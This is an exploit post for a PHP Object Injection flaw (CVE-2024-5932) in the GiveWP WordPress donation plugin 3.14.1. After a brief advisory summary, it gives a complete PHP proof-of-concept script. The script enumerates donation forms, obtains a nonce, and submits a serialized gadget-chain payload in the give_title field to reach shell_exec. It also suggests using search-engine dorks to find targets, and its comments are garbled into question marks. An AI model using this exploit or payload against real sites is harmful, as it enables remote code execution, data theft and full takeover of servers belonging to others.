WordPress GiveWP Donation 3.14.1 PHP Object Injection

The GiveWP Donation plugin version 3.14.1 (and earlier) for WordPress The GiveWP Donation plugin version 3.14.1 (and earlier) for WordPress was vulnerable to a critical PHP Object Injection.

This flaw stemmed from insecure deserialization of user-supplied data. Authenticated users, even with low-privilege roles like subscriber, could craft malicious serialized PHP objects.

When processed, these objects could trigger arbitrary PHP code execution (Remote Code Execution or RCE). RCE allows attackers to fully compromise the affected WordPress site, including data theft, defacement, or complete takeover.

Users were strongly urged to update immediately to version 3.14.2 or higher, which patched the flaw.

=============================================================================================================================================
| # Title : GiveWP Donation 3.14.1 PHP Object Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://givewp.com |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.

What the script does:

Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.

Enumerates donation forms by calling the give_form_search action.

Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.

Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.

Injects the payload into a donation request parameter (give_title).

Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.

Outputs the server response, which may contain command execution results if the target is vulnerable.

Impact:

Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.

The attack requires no authentication if the affected AJAX actions are exposed.


(Related : https://packetstorm.news/files/id/180463/ Related CVE numbers: CVE-2024-5932 ) .

[+] Payload :

[+] Set Target : line 17

[+] Usage : php poc.php

[+] PayLoad :

<?php

// ??????? ???? PHP Object Injection ?? ????? GiveWP ?????????

function send_request($url, $data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

$target = "http://victim-site.com"; // ?????? ?????? ?????? ????????

// ?????? ??? ????? ???????
$form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
$form_list = json_decode($form_list, true);
if (empty($form_list)) {
die("??? ?? ??? ????? ???????.");
}

// ?????? ????? ??????
$selected_form = $form_list[array_rand($form_list)];
$form_id = $selected_form['id'];

// ??? ?????? ?????????
$form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
$form_data = json_decode($form_data, true);
if (!isset($form_data['data'])) {
die("??? ?? ??? ?????? ???????.");
}
$form_hash = $form_data['data'];

// ????? ??????? (Payload)
$payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
's:10:"shell_exec";s:12:"\0*\0generator";' .
'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
's:11:"\0*\0settings";a:1:{s:8:"address1";s:'.strlen('whoami').':"whoami";}}' .
's:13:"\0*\0maxRetries";i:10;}}}}}}';

// ????? ?????????
$data = http_build_query([
'give-form-id' => $form_id,
'give-form-hash' => $form_hash,
'give-price-id' => '0',
'give-amount' => '$10.00',
'give_first' => 'John',
'give_last' => 'Doe',
'give_email' => 'This email address is being protected from spambots. You need JavaScript enabled to view it.',
'give_title' => $payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
]);

$response = send_request("$target/wp-admin/admin-ajax.php", $data);
echo "Response: \n$response\n";

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================